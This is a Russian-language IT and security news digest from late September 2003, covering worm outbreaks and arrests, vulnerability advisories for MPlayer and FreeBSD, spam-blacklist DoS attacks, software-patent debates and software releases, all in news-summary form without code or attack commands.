27 сентября вышел очередной номер электронного журнала, выпускаемого анти-спамерской коалицией "Спамтест". Выпускает журнал компания "Ашманов и Партнеры". Сам номер посвящён основным событиям прошедшей недели, основным из которых, несомненно, является в контексте тематики журнала проходившая 24-25 сентября в московском Доме Общественных Организаций Первая национальная конференция "Проблема спама и ее решения". В конце номера - новости недели, в которых зафиксированы случаи E-mail и SMS-спама, начавшегося в предвери грядущих выборов. Подробности - http://subscribe.ru/archive/inet.safety.spamtest/200309/27012631.html
29/09/2003 16:34 Задержан второй подозреваемый в организации нашествия червей.
В пятницу Министерство юстиции США объявило об аресте подростка в связи с распространением компьютерного червя, подобного MSBlast. Предполагается, что подозреваемый создал и выпустил на волю червя, известного под именами Spybot.worm.lz, Randex.E и RPCSdbot: он использует обнаруженный в середине июля пробел в защите операционных систем Microsoft. Минюст заявил, что этот арест служит предупреждением всем интернет-шутникам. «Компьютерные хакеры должны усвоить, что они будут преследоваться и отвечать за противозаконные действия независимо от того, сколько им лет», — говорится в заявлении прокурора Западного округа Вашингтона Джона Маккея. Ввиду несовершеннолетия подозреваемого Министерство юстиции отказалось назвать его (ее) имя и пол. Получить комментарии у представителя департамента пока не удалось. Это уже второй арест в связи с распространением вирусов онлайновыми вандалами, использующими ошибки в ПО. Считается, что оригинальный червь MSBlast (известный также под именами Blaster и Lovsan) и его неполноценный двойник Welchia или Nachi, преследующий цель защиты уязвимых систем от оригинального червя, в общей сложности заразили более миллиона компьютеров. Источник - http://www.lenta.ru
29/09/2003 16:11 Китай строит национальную вычислительную сеть.
К 2006 году 100 китайских университетов будут связаны между собой сетью, которая объединит их вычислительные ресурсы с целью создания распределенного суперкомпьютера. В среду микропроцессорный гигант Intel подписал соглашение с Министерством образования Китая о создании национальной вычислительной grid-сети. Как утверждается в заявлении Intel, по завершении проекта министерство рассчитывает получить производительность свыше 15 терафлопс (триллионов операций в секунду), что сделает сеть одной из самых мощных в мире. Начиная с этого года Intel будет сотрудничать с производителями серверов, чтобы оснастить учебные заведения компьютерами на базе процессоров Itanium 2. Сеть будет применяться для исследований в области наук о жизни, нефтяной промышленности, сейсмологии и в коммерческих финансовых проектах. Кроме того, она поможет осуществить идею «цифровой олимпиады», обслуживая Олимпиаду-2008 в Пекине. Университеты, подсоединенные к grid-сети, будут связаны друг с другом высокоскоростной сетью China Education and Research Network. Подробности - http://zdnet.com.com/2100-1103_2-5082097.html
29/09/2003 16:01 Хакеры вовсю используют незаделанные дыры в Internet Explorer.
Эксперт eEye Digital Security Дрю Копли (Drew Copley) сообщила Reuters, что вариантов использование дыр в Internet Explorer зафиксировано немало. Как правило, злоумышленники заманивают пользователя на сайт с кодом, использующим дыру, и засылают на компьютер жертвы трояна. Эти программы могут перехватывать информацию, вводимую с клавиатуры, или похищать данные с жесткого диска компьютера. Еще одной разновидностью подобных программ стала утилита для похищения учетных записей интернет-пейджера AIM. Будучи активированной на компьютере с запущенным AIM, эта программа меняет пароль учетной записи и отсылает сообщение своему владельцу. Используются злоумышленниками и программы-дайлеры, меняющие номер телефона для модемного доступа в интернет на номер с высокой повременной оплатой. Учитывая разнообразие используемых троянских программ, пользователям стоит осторожнее вести себя в Сети и установить патч от Microsoft, как только он будет выпущен. Источник - http://www.compulenta.ru
26/09/2003 16:35 RTFM по командам консоли Win2000.
На сайте www.sysadmins.ru опбуликована отличная статья, основное назначение которой - краткое описание команд консоли ОС Windows2000. Опубликована Domino_Admin в форуме RTFM. В конце статьи стоит копирайт на http://www.winsov.com. Думается, статья может оказаться полезной многим пользователям Win2K. Ccылка - http://portal.sysadmins.ru/board/viewtopic.php?t=19593
26/09/2003 15:02 Новая версия PalmOS… 5-я.
В то время пока полным ходом идет разработка 6-й версии PalmOS, было решено выпустить облегченную 5-ку специально для дешевых устройств ( до 200$). По словам исполнительного директора Давида Нейджела (David Nagel): «5я версия PalmOS очень компактна и обладает достаточными возможностями для на недорогих устройств», об этом он заявил на конференции в Мюнхене посвященную Palm. В настоящее время существуют смартфоны под управлением PalmOS производства Handspring и Samsung, но они работаю на 3-й или 4-й версии этой операционной системы. По предварительным сведениям компании в скором времени анонсируют свои новые модели смартфонов на которых будет установлена PalmOS 5. Источник - http://www.mobile-review.com
26/09/2003 14:19 Уязвимость в MPlayer.
В MPlayer обнаружена ошибка, связанная с возожностью переполнения буфера. Переполнение буфера в стеке происходит при проигрывание ASX с неверными заголовками и может привести к выполнению произвольного кода от имени пользователя, от имени которого MPlayer проигрывает специальным образом сформированный медиа-файл. Уязвимости подвержены следующие версии:MPlayer 0.90pre series, MPlayer 0.90rc series, MPlayer 0.90, MPlayer 0.91, MPlayer 1.0pre1. Для всех этих версий доступен патч на сайте производителя. Подробности - http://mp.dev.hu/homepage/design6/news.html
26/09/2003 13:33 Уязвимость в FreeBSD.
Команда разработчиков ОС FreeBSD сообщает о наличии уязвимости в этой ОС. Связана она с реализацией протокола ARP (Address Resolution Protocol), использующимся на 2-м уровне сетевой модели TCP/IP для преобразования IP-адресов в MAC-адреса сетевых карт. Так как функция arplookup() не производит освобождение ARP-кэша, cуществет возможность (путём посылки множественных "левых" ARP-пакетов) вызвать панику системы с её дальнейшим повисанием. Так как ARP используется только в пределах одного сегмента сети и не передаётся через роутеры, возможность атак подобного рода довольно ограничена. Однако, возможности атаки огут быть значительно расширены в случае WiFi-сетей и использования технологии ARP-proxy. Командой разработчиков выпущены соответствующие патчи для версий 5-CURRENT, 4.9-PRERELEASE, и 4.8. Подробности - ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03%3A14.arp.asc
26/09/2003 13:01 Cравнение производительности ядер 2.4.* и 2.6.* Linux.
Cliff White провел сравнительное тестирование стабильного Linux-ядра версии 2.4.23-pre5 с последними разработками в области новой ветки: 2.6.0-test5 и 2.6.0-test5-mm4. Оказалось, что стабильное 2.4-ядро все еще превосходит пробные версии 2.6-ядра на одном процессоре, однако уступает на многопроцессорном сервере. При тестировании использовался софт re-AIM (http://sourceforge.net/projects/re-aim-7) и ядра 2.4.23-pre5, 2.6.0-test5, 2.6.0-test5-mm4. Подробности - http://kerneltrap.org/node/view/903
26/09/2003 11:27 Выход сентябрьского номера журнала "Системный администратор".
На сайте www.samag.ru cообщается о выходе очередного (сентябрьского) номера журнала "Системный администратор". В номере представлены следующие статьи: Виртуальный полигон для администратора и разработчика; Маленький Linux в качестве firewall; Работа с жестким диском на программном уровне; Работа с жестким диском на программном уровне; Искажение TOC как средство борьбы с несанкционированным копированием диска; Postfix+...+SpamAssassin.Mini-howto. etc. Подробности - http://www.samag.ru
26/09/2003 10:28 Антивирусы докладывают...
Symantec расширила функциональные возможности службы раннего предупреждения об угрозах информационной безопасности - DeepSight Threat Management System, которая в обновленном варианте будет предоставлять корпоративным абонентам данные об эпидемиях вирусов и "червей". DeepSight работает, накапливая и обрабатывая данные, поступающие из сетей 20 тыс. сотрудничающих с Symantec компаний. Первоначально служба собирала лишь данные систем распознавания вторжений; в дальнейшем ее возможности постепенно наращивались. Так, в начале года была запущена в действие DeepSight 4.0, собирающая информацию, предоставляемую межсетевыми экранами. Новая версия в дополнение ко всем прежним функциям накапливает сведения, поступающие с действующих антивирусных сканеров Symantec, количество которых во всем мире, по данным компании, насчитывает свыше 100 млн. Истоочник - http://www.osp.ru
26/09/2003 10:19 Антиспамовые серверы закрываются из-за DoS-атак.
За последнее время в интернете закрылись три сайта, на которых велись черные списки почтовых серверов, замеченных в пересылке большого количества мусорной почты. Причиной для закрытия черных списков стали масштабные DoS-атаки. По сообщению агентства Reuters, среди закрывшихся под давлением атак сайтов присутствуют достаточно крупные и известные черные списки Monkeys.com, Osiriusoft.com и список провайдера Compu-Net Enterprises из штата Теннесси. Все эти черные списки так или иначе столкнулись с атаками. Например, в случае Compu-Net спамеры начали рассылать письма от лица компании, чтобы дискредитировать ее перед клиентами, а Monkeys.com за последние месяцы столкнулся с несколькими DoS-атаками длительностью от трех до семи дней. Продолжать работу в таких условиях администраторы черных списков не могут. Кто является организатором атак, достоверно неизвестно. Однако активисты по борьбе со спамом уверены, что это происки спамеров. Большинство атак на черные списки, по свидетельствам пострадавших, были очень хорошо подготовлены. Не исключено, что для создания сетей атакующих машин использовались компьютерные черви или трояны, подобные Sobig. Впрочем, прямых доказательств этого у борцов со спамом нет. Источник - http://www.compulenta.ru
25/09/2003 17:58 Выход Opera 7.20.
Норвежская компания Opera Software сообщает о выходе новой версии довольно популярного Вэб-браузера Opera. В версии 7.20 Opera подверглась множеству изменений и нововведений во всех областях. Можно отметить появление поддержки двунаправленного письма (арабские языки и иврит), улучшенную производительность и стабильность программы. Но одна из главных и неожиданных новинок коснется всех пользователей, которые пользуются браузером бесплатно. Теперь при старте программа спросит, какого типа баннеры вы хотите смотреть: обычные или контекстную рекламу от Google. В последнем случае пользователю будет показываться в основном русскоязычная реклама. Более подробно - http://www.opera.com/pressreleases/en/2003/09/23
25/09/2003 17:36 CCIA: Microsoft угрожает госбезопасности США.
Монополия компании Microsoft в сфере производства программного обеспечения для компьютеров снижает степень защищенности компьютерных систем и способствует распространению вирусных эпидемий. Исследование об этом было распространено на собрании Ассоциации компьютерной и телекоммуникационной отрасли (CCIA) в Вашингтоне (округ Колумбия), спонсорами которого выступили конкуренты редмондского гиганта, сообщает агентство France Presse. В самой Microsoft пока еще не никак не отреагировали на обнародованное исследование. Все выступавшие на конференции делали упор на то, что Microsoft, желая сделать свою продукцию более доступной пользователю, совершенно не обращает внимания на ее безопасность. В частности, обилие встроенных прикладных программ в операционной системе Windows, которая установлена на девяти ПК из десяти в мире, влечет за собой обилие уязвимостей и дыр, отмечает Дэниел Гир, один из соавторов исследования. При этом некоторые эксперты заявили, что такое качество продуктов в любой другой отрасли было бы недопустимым. Подробнее - http://www.compulenta.ru/2003/9/25/42188/
25/09/2003 17:25 Европейский парламент сказал "да" софтверным патентам.
Европейский парламент высказался за введение на территории Европейского союза введения патентов на программное обеспечение, сообщает агентство Reuters. В первом чтении за закон о введении софтверного патентования проголосовали 364 депутатов, против - 153, а 33 депутата воздержались. Законопроект о легализации патентов на программное обеспечение внесла на рассмотрение английский депутат от лейбористской партии Арлин Маккарти. Согласно ее предложению, компьютерные программы должны быть защищены такими же патентами, как и любая иная промышленная собственность. Между тем, в течение месяца накануне голосования европейское компьютерное сообщество активно агитировало депутатов отклонить законопроект. В конце августа прошла целая серия протестов и митингов ассоциации Eurolinux, а накануне голосования с критикой патентов на программное обеспечение выступили такие авторитеты сообщества программистов, как Линус Торвальдс и Алан Кокс. В своем открытом письме они делают упор на то, что патенты на ПО только ослабят рынок и увеличат расходы небогатых софтверных компаний на лицензирование технологий и оплату юридических услуг в ущерб исследованиям и разработкам. Подробнее - http://fr.news.yahoo.com/030924/85/3etjo.html
25/09/2003 17:03 Гостехкомиссия России сертифицировала ASPLinux.
Как сообщается на linux.org.ru, дистрибутив ASPLinux 7.3 Server Edition с файловой системой XFS сертифицирован Гостехкомиссией РФ по 5 классу защищенности для СВТ и по 4 уровню контроля для НДВ. Для выполнения требований, предъявляемых Гостехкомиссией к программным продуктам, в программные пакеты и документацию дистрибутива были внесены незначительные изменения. Подробности - http://www.asplinux.ru/ru/pr/id,52531
25/09/2003 16:36 Конкурс по взлому сервера ALT Linux на SofTool-2003.
На стенде ALT Linux на выставке SofTool'2003 будет проходить конкурс по взлому сервера на базе ALT Linux Master 2.2. Конкурс проводится на стенде компании ALT Linux на выставке "SoftTool-2003", проходящей с 30 сентября по 4 октября 2003 года в павильоне N69 Всероссийского Выставочного Центра. Стенд ALT Linux - М27. Участникам выдаётся стандартный пользовательский аккаунт с правами по умолчанию: login: aaa password: qwerty. Задача - получение прав суперпользователя. Условия конкурса - http://altlinux.ru/?module=softool2003?=348
25/09/2003 16:15 Cтатья "С кем угодно, только не со мной".
На сайте webplanet.ru опубликована статья Екатерины Мироновой "С кем угодно, только не со мной", основанная на исследовании, проведённом компанией PSINet Europe совместно с Pan Security International (PanSec). Исследование продемонстрировало, какому риску подвергается фирма, пренебрегая онлайн-защитой. В рамках опыта было организовано два веб-сайта, моделирующих страницы европейских банков. Один из образцов был оставлен безо всякой защиты, а второй оборудован стандартной системой firewall. В течение двух недель отслеживались атаки на оба сайта, затем их количества были подсчитаны и сопоставлены. Выяснилось, что на незащищенный сервер напали 19 128 раз. Эта цифра примерно в 10 раз превышает показатель второй страницы, которая за два месяца была атакована 1 672 раза. Наличие firewall существенно уменьшает риск вмешательство со стороны хакеров, и исследование это наглядно демонстрирует. Однако уровень угрозы приблизительно трети атак, направленных против защищенного сайта, был классифицирован как высокий. Это означает, что любое из нападений, теоретически, могло прекратить работу системы. Следовательно, даже эффективная программа останется простой декорацией, если ее неправильно настроить, либо в момент, когда вдруг обнаружится очередная неведомая ранее брешь. Подробнее - http://www.webplanet.ru/news/security/2003/9/25/psinet_pansec.html
24/09/2003 14:17 Украинцы получили еще один домен.
В зоне .BIZ.UA началась регистрация. Опубликована предварительная версия правил домена и сейчас производится их доработка совместно с регистраторами. На данный момент с Администрацией домена заключили договора 8 регистраторов, среди которых такие известные на рынке компании, как ООО "Первый украинский интернет-регистратор" и ООО "Эллайд Стандарт Лимитед". Регистрацию осуществляет каждый из восьми партнеров Администрации. «Новейшие технологии, применяемые группой разработчиков программного обеспечение .biz.ua позволят делегировать домен в считанные минуты», - сообщается в распространенном пресс-релизе. 20 сентября было окончено резервирование доменов, началась их регистрация. Всего было зарезервировано 1717 доменов. Источник - http://www.runet.ru
24/09/2003 13:44 Вышла новая версия Kaspersky Anti-Spam.
"Лаборатория Касперского" сообщает о выпуске и начале продаж новой версии программного комплекса для защиты от нежелательных электронных рассылок - Kaspersky Anti-Spam 1.5. Новое ПО представляет собой средство противодействия спаму на основе многоуровневой системы фильтрации электронной почты. Пользователи Kaspersky Anti-Spam обеспечиваются ежедневными обновлениями базы лексических сигнатур, используемых при детектировании спама. Новая версия Kaspersky Anti-Spam включает в себя широкий ряд технологических изменений и доработок. Источник - http://www.kaspersky.ru
24/09/2003 13:21 Site Finder - страсти разгораются.
Американский интернет-провайдер VeriSign отверг предложение организации ICANN отсрочить внедрение сервиса Site Finder, предназначенного для вывода вариантов при неверном запросе пользователя в адресной строке браузера. Данный запрос был вызван необходимостью дождаться результатов исследований комиссий по безопасности и стабильности (Security and Stability Advisory Committee) и совета по архитектуре интернета (Internet Architecture Board), поскольку у специалистов возникли опасения, что ряд приложений, ориентирующихся на стандартное сообщение сервера об ошибке 404, будут работать некорректно в связи с внедрением новой услуги. В связи с этим юристы ICANN пересматривают контракты с провайдером на регистрацию имен в зонах .com и .net. Внедрение данного сервиса уже послужило поводом для судебных исков от интернет-компаний Go Daddy Software и Popular Enterprises, руководство которых считает, что VeriSign использует свое преимущественное положение регистратора имен в зонах .com и .net для недобросовестной конкуренции. VeriSign намерен определиться с дальнейшей судьбой сервиса Site Finder только после сбора необходимой информации о его функционировании, пока же в ПО, обслуживающее сервис, постоянно вносятся дополнения и изменения. Источник - http://www.cnews.ru
24/09/2003 12:12 Бесплатная проверка безопасности корпоративной сети.
Сегодня появляются разные средства защиты корпоративных сетей, но первым шагом в реализации мер безопасности должна быть проверка уязвимости вашей сети. Это можно сделать даже бесплатно: например, новый сервис телекоммуникационной компании "2КОМ" позволяет провести аудит безопасности информационной системы предприятия и получить рекомендации по устранению брешей в защите. На сайте ipGuard можно оставить заявку на бесплатный аудит сети предприятия (имеет смысл сделать это сейчас - бесплатная проверка будет осуществляться до конца сентября). Проверка не отнимет много времени, так как будет проводиться удалённым способом и не повлияет на работоспособность сети. Для проверки будет использоваться база всех известных методов сетевых атак. По результатам аудита составляется отчет. В случае необходимости специалисты "2КОМ" разработают для вашей компании комплекс мер по обеспечению безопасности. По материалам compulenta.ru. Cервер "2KOM" - http://www.2com.ru/ Cервер "ipGuard" - http://www.ipguard.ru/audit/
24/09/2003 12:03 Спецслужбы не посягнут на SMS москвичей.
Как и положено, вслед за новостью о контроле ФСБ SMS, посылаемыми москвичами, начинают поступать опровержения от операторов мобильной связи, которые провергают появившиеся в московской прессе слухи о возможном введении спецслужбами мониторинга коротких сообщений. В пресс-службе крупнейшего российского оператора сотовой связи МТС "Компьюленте" сообщили, что подобная информация является вымыслом. "Ни о каком контроле российских спецслужб за короткими сообщениями речи нет и не будет", - заявили в пресс-службе, отметив, что данную публикацию в "Столичной" (именно в ней впервые появилось сообщение о контроле SMS) считают газетной уткой. Примерно так же отреагировали в пресс-службе компании "Вымпелком" (торговая марка "БиЛайн"), заявив, что впервые слышат о системе дешифровки SMS. Кто говорит правду - решать вам. Возможно, истина где-то посредине. ;) Источник - http://www.compulenta.ru
24/09/2003 10:59 Компьютерный вирус парализовал работу Госдепартамента США.
Компьютерный вирус, проникший во вторник вечером в компьютерную сеть Госдепартамента США, парализовал выдачу американских виз в посольствах по всему миру, сообщает AP. Вирус вывел из строя базу данных CLASS (Consular Lookout and Support System), которая используется консульскими службами посольств США для проверки данных людей, подающих прошение о визе, на предмет их связи с террористическими организациями и другими преступными элементами. В базе данных, по состоянию на сентябрь 2003 года, содержится информация о 13 миллионах людей. Компьютерной службе Госдепартамента США не удалось сразу устранить проблему. Во все американские консульства и посольства были разосланы сообщения "Работа CLASS остановлена вирусом". Восстановить работу базы данных удалось через несколько часов. Представитель внешнеполитического ведомства США Джоанн Мур (Joanne Moore) подтвердила, что в компьютерной системе Госдепа произошел сбой, однако не уточнила, идет ли речь о поражении вирусом базы данных CLASS. По предварительным данным, компьютеры Госдепартамента были поражены вирусом Welchia. Источник - http://www.compulenta.ru
24/09/2003 10:07 ФСБ начинает читать SMS-ки москвичей.
В Москве начала работать система контроля текстов SMS-сообщений по ключевым словам. Как сообщает телеканал "Россия", сотрудники спецслужб подготовили список слов и выражений, использование которых в SMS-сообщениях вызывает у них подозрения. Oтныне все сообщения, которые содержат слова из этого 'черного списка', будут записываться в базу данных операторов сотовой связи для дальнейшей передачи работникам спецслужб. В полном объеме система заработает через несколько дней, а первые дни, во время ее отладки, сообщения, содержащие слова из "черного списка", не будут доходить до адресата с первого раза. По словам разработчиков, нововведение должно помочь спецслужбам в выполнении задачи обеспечения безопасности в городе. Подробности - http://www.vesti.ru/news.html?id=40900
23/09/2003 17:08 Появилась версия «Y» червя Opaserv.
Вирусная Лаборатория PandaLabs обнаружила версию «Y» червя Opaserv. По данным, предоставленным международной Службой технической поддержки Panda Software, данный вредоносный код уже стал причиной заражений компьютеров. В поисках своих жертв Opaserv.Y распространяется по сети Интернет. Opaserv.Y попадает на компьютер через порт 139 и копирует себя в папку C:\Windows под именем Speedy.scr. В то же время червь создает несколько записей в Реестре Windows для обеспечения автоматической активации при каждом запуске компьютера. Если зараженный компьютер подключен к сети, Opaserv.Y использует брешь в Windows, известную как Share Level Password (основанную на несостоятельности защиты общих сетевых ресурсов в операционных системах Windows Me/98/95), для распространения на все остальные компьютеры данной сети. К настоящему моменту Лаборатория PandaLabs обнаружила две версии Opaserv.Y. Различие заключается в используемой утилите сжатия. Одним из признаков данного червя является то, что при его запуске в окне MS-DOS на экран выводится не стандартное сообщение: “Данная программа требует MS Windows”, а одно из следующих: - Telefonica ganhe menos e faca mais!! - Queremos melhores servicos da SPEEDY - Melhorem o servico Speed seus FDPS!! По причине появления случаев заражения и для того, чтобы не стать новой жертвой Opaserv.Y, компания Panda Software советует пользователям с осторожностью обращаться со всеми полученными сообщениями и немедленно обновить свои антивирусные продукты. Источник - http://www.viruslab.ru
23/09/2003 16:33 FunLove "покусал" веб-сайт компании Samsung.
Специалисты "Лаборатории Касперского" сообщают об обнаружении вируса Win32.FunLove.4070 в файле, доступном для скачивания с сайта компании Samsung Electronics. Зараженный файл был обнаружен в комплекте поставки драйверов для монитора st56e. Информация о вирусе на сайте Samsung Electronics была получена от пользователей Антивируса Касперского. Вирусологи предупреждают: необходимо соблюдать осторожность при загрузке файлов из сетевых источников; как показывает этот и многие другие случаи, опасность не исключена даже когда речь идет о крупных производителях компьютерного оборудования и программного обеспечения. Со времени появления этого вируса было зарегистрировано несколько случаев масштабного сетевого заражения. В частности, в 1999 году атаке FunLove подвергался завод Dell в Ирландии, в 2000 - компания Hewlett Packard распространяла инфицированные этим вирусом программы, а в 2001 Microsoft предупреждала партнеров о наличии вируса в патчах, размещенных на их сайтах. Кроме того, FunLove оказался первым вирусом, распространяющимся на DVD. Для компании Samsung Electronics это также не первый инцидент подобного рода - в декабре прошлого года компания признала, что драйвер 151 серии ЖК-мониторов оказался зараженным вирусом Nimda. Зараженный драйвер был моментально убран с сайта компании. Подробнее - http://www.viruslist.com/index.html?tnews=1008&id=2880367
23/09/2003 15:15 Правительство США обяжет производителей ПО следить за безопасностью продуктов.
Представители руководства пяти федеральных ведомств США по инициативе Министерства энергетики соберутся во вторник в Вашингтоне, чтобы обсудить новый порядок заключения контрактов между правительственными структурами и производителями программного обеспечения. Главная цель встречи - выработать механизм, предусматривающий ответственность производителей за защиту своих продуктов от вирусных и хакерских угроз, сообщает сайт ZDNet. Министерство энергетики подготовило образец контракта, который представляет новый вариант приобретения программного обеспечения со встроенной защитой и требует от производителей более ответственного подхода к ликвидации возможных брешей в системе безопасности. По мнению руководителя отдела исследований института SANS (SysAdmin, Audit, Network, Security) Алана Поллера (Alan Paller), инициатива федеральных ведомств приведет к значительному укреплению информационной безопасности: "Правительство использует свои полномочия, чтобы изменить метод, которым пользуются продавцы программного обеспечения для поставки своего товара". Источhttp://zdnet.com.com/2100-1105_2-5053545.html
23/09/2003 14:05 Вышел RTK 0.4: Дистрибутив для проверки безопасности.
RTK: Russian Trinux Kit - это первый российский дистрибутив ОС Linux, предназначенный для анализа сетевой безопасности удаленных и/или локальных вычислительных систем и сетей. RTK содержит последние версии популярных digital security утилит, написанных как специалистами по безопасности, так и высококвалифицированными хакерами. В поставку входят всевозможные сетевые утилиты, сканнеры, снифферы, криптографические средства, файрволлы, прокси серверы, редиректы, релизы известных хакерских групп и пр. В общей сложности система содержит более 150 security-программ. Система не требует установки и ей НЕ нужен жесткий диск, виртуальный раздел системы создается в ОЗУ (RAM). Данная особенность позволяет Вам использовать систему на любой машине с достаточным количеством оперативной памяти (это очень удобно для людей, которые хотят провести "сетевой анализ", но находятся вдали от своего родного ПК). Подробности - http://linuxsecurity.ru/
23/09/2003 13:25 Цензура в Сети: не пора ли бояться?
По информации с webplanet.ru. Интернет никогда не был местом процветания гражданских прав и свободы слова, и в настоящее время контроль только ужесточается. Такова главная мысль опубликованного вчера доклада. В основу отчета легли выводы, полученные в ходе глобального исследования под названием Silenced — оно стартовало в Женеве во время очередной встречи Комитета по подготовке всемирного саммита, посвященного проблемам сетевого сообщества. «Власти усилили слежку, начиная с мониторинга электронной почты и заканчивая удержанием блогов и коммуникационных данных, — цитирует доклад журнал Silicon.com. — В то же время, правительства стали более скрытными относительно собственной деятельности, снизив количество информации, ранее доступной всем; они отказываются придерживаться принципа свободы информации». В отчете также представлены факты осуществления надзора и цензуры в интернете в политических целях, которые имеют место в авторитарных странах. Однако уровень такого контроля ниже за счет отсутствия соответствующих технологий. Подробности - http://www.privacyinternational.org/survey/censorship/
23/09/2003 12:37 Иск Eolas может привести к изменениям в HTML.
В веб-сообществе растет тревога из-за патента, угрожающего браузеру Microsoft Internet Explorer, а ведущая организация по стандартизации веб-технологий, чтобы избежать аналогичной угрозы, рассматривает возможность модификации самого lingua franca — HTML. Как сообщают источники, в связи с патентным иском компании Eolas консорциум World Wide Web Consortium (W3C) вот-вот сформирует консультативную группу PAG (patent advisory group). Она займется проведением открытого исследования юридических последствий патента для Hypertext Markup Language, основополагающего стандарта W3C, на котором построено большинство веб-сайтов, и для других сопутствующих спецификаций. Победа Eolas над Microsoft с ее браузером Internet Explorer в деле о патенте на 521 млн долл. вызвало шок в веб-сообществе и софтверной индустрии в целом. Хотя Microsoft намерена опротестовать решение суда, она уже подготовилась к наихудшему сценарию, как и другие компании, в частности Macromedia и Sun Microsystems, чьи технологии существенно зависят от способности IE исполнять интегрируемые модули (plug-ins): она-то и признана нарушающей патент Eolas. А W3C, утверждают источники, рассматривает возможные изменения в HTML, который считается одной из наиболее зрелых и устоявшихся спецификаций. Потенциальная проблема HTML заключается в том, что в нем описывается способ активизации контента на сервере, отличающийся от обслуживания соответствующей страницы. А именно, члены консорциума обеспокоены тем, что под действие патента Eolas могут попасть теги HTML object и embed. Более подробно - http://www.zdnet.ru/?ID=306897
23/09/2003 12:03 Sun и Check Point представили совместное решение по безопасности.
Компании Sun Microsystems, Check Point Software Technologies и Корпорация ЮНИ представляют программу продвижения совместных решений Sun и Check Point в области защиты информации на российском рынке. Интегрированные решения Sun Microsystems и Check Point призваны повысить уровень защищенности сети предприятия. Они созданы на основе систем Sun LX50, Sun Fire V65x под управлением ОС Linux и Solaris x86, Sun Fire V210, Sun Fire V240 на платформе SPARC под управлением ОС Solaris и программного обеспечения Check Point VPN-1/FireWall-1. Совместное решение способно более эффективно противостоять угрозам из интернета и обеспечивать максимальную защиту корпоративной сети. Оно подходит как для крупных предприятий, так и для небольших организаций численностью до 100 человек, так как требует минимум средств и временных затрат на развертывание и сопровождение. В части практической реализации программы продвижения Sun Microsystems и Check Point сотрудничают с корпорацией ЮНИ. В июне 2003 года стартовала программа ЮНИ “Формула универсальной безопасности”. Программа включает годовую сервисную и техническую поддержку, обучение одного специалиста в учебном центре NTC Корпорации ЮНИ и предустановку программного обеспечения на сервер. Источник - http://www.sun.com
23/09/2003 11:26 Назван новый "гуру" по информационной безопасности США.
В администрацию президента Буша утвердили Амит Йоран (Amit Yoran), бывшего исполнительного директора компании Symantec, который теперь будет курировать вопросы национальной информационной безопасности. Как заявили представители администрации, кандидатура Амита Йорана была выбрана ввиду значительного опыта, которым располагает этот ветеран фронта компьютерных атак, как в частном, так и в корпоративном секторе. На новом посту Йоран будет выполнять две основные функции. С одной стороны, он должен представлять интересы госструктур в борьбе с киберпреступностью. С другой стороны он также будет контролировать повышение уровня безопасности как физических, так и юридических лиц США. Йоран становится наследником Ричарда Кларка (Richard Clarke), долгое время возглавлявшего борьбу Белого Дома против кибертерроризма и покинувшего свой пост в январе этого года. После этого был принят закон о внутренней безопасности, и правительственные структуры, занимающиеся обеспечением компьютерной безопасности, перешли под контроль Департамента внутренней безопасности, объединившего функции пяти ранее существовавших спецструктур. В частности, это были: Центр по защите национальной инфраструктуры ФБР (National Infrastructure Protection Center), Национальная коммуникационная система Департамента безопасности (National Communications System), Отдел обеспечения безопасности стратегически важных объектов Департамента Финансов (Critical Infrastructure Assurance Office), Аналитический центр Департамента Энергетики (analysis center), а также Федеральный центр обработки запросов по компьютерным инцидентам (Federal Computer Incident Response Center). Источник - http://www.cnews.ru
22/09/2003 17:43 Торвальдс и Кокс пишут в Европарламент.
Линус Торвальдс (Linus Torvalds) и Алан Кокс (Alan Cox) отправили главе Европарламена Пэту Коксу (Pat Cox) и другим законодателям обращение, озаглавленное "Открытое письмо о патентах на ПО от разработчиков Linux" ("Open Letter on Software Patents from Linux developers") - сообщает linuxcenter.ru. В этом документе Торвальдс и Кокс объясняют, что патенты вредят малым и средним предприятиям и попросту недопустимы, если речь идет о стандартах. "Патенты на ПО более всего угрожают разработке Linux и других открытых продуктов. [...] Мы хотим дать миру высококлассное, высококачественное, инновационное программное обеспечение [...]. Пожалуйста, не делайте эту задачу еще более сложной, чем она есть сейчас!"-призывают "отцы Linux". Торвальдс и Кокс предложили законодателям взять на вооружение рекомендации FFII и руководствоваться ими во время финального голосования, которое состоится сегодня, 22 сентября, в Брюсселе. Письмо - http://www.effi.org/patentit/patents_torvalds_cox.txt
22/09/2003 17:19 Выход Knoppix 3.3.
Как сообщается на nixp.ru, вышла новая версия популярного Linux LiveCD-дистрибутива Knoppix — 3.3 (V3.3-2003-09-22). Из новшеств: поддержка протокола AX25 по запросу; опция загрузки tohd=hda1 изменена на tohd=/dev/hda1; новая и улучшенная версия неофициального установщика knoppix-installer" от Fabian'а Franz'а; сервисное меню для экспорта Samba; вновь добавлен x-chat; ddcxinfo-knoppix теперь использует расширенный монитор modelines'ов от Kano по умолчанию. Подробности - http://spirit.bentel.sk/knoppix/KNOPPIX-CHANGELOG.txt
22/09/2003 16:05 Кривой php-скрипт как прокси для всех желающих.
Ccылку на любопытную статью приводит dl на своём сайте www.bugtraq.ru. Cтатья посвящена одной проблеме при написании php-скриптов - если программист умудрится передать пользовательский ввод непосредственно в функции fopen, file, include, то в один прекрасный момент он может обнаружить, что этот скрипт используется всеми желающими в качестве халявного прокси. Впрочем, это врядли можно назвать уязвимостью php, ибо по сути это является элементарным просчетом программиста. В конце концов, фильтрация пользовательского ввода стоит под номером один во всех руководствах по безопасному веб-программированию - и без столь легкого открытия внешних адресов, как это сделано в php, подобный просчет привел бы к гораздо более опасной возможности чтения любого файла на самом сервере. Ну а взглянуть на развитие идеи вплоть до реализации своего прокси и ремейлера, конечно, полезно и поучительно. Кстати, как ни странно, статья датирована завтрашним днём. ;)) Автор - Jackie Treehorn. Статья - http://detail.phpclub.net/2003-09-23.htm
22/09/2003 15:45 Банкоматы будут предрасположены к сбоям.
В будущем могут стать реальностью ситуации, когда банкоматы откажутся выдавать клиентам наличные. К обслуживанию терминалов подключили Microsoft. Как сообщил сайт O'Reilly Developer News, в 2005 году на 65% банкоматов США будет установлена урезанная версия Windows. Аналитики и эксперты уже поспешили восхвалить перспективу такого сотрудничества. Так Гвен Беззард отметил, что банкоматы уже готовы к внедрению OS/2. Это должно сделать их более мощными чем сейчас. Правда мистер Беззард, как и другие эксперты, скромно умалчивает о возможности сбоев в работе «усиленных» банкоматов. Источник - http://www.runet.ru
22/09/2003 15:02 ACDSee 6.0 появится в середине октября.
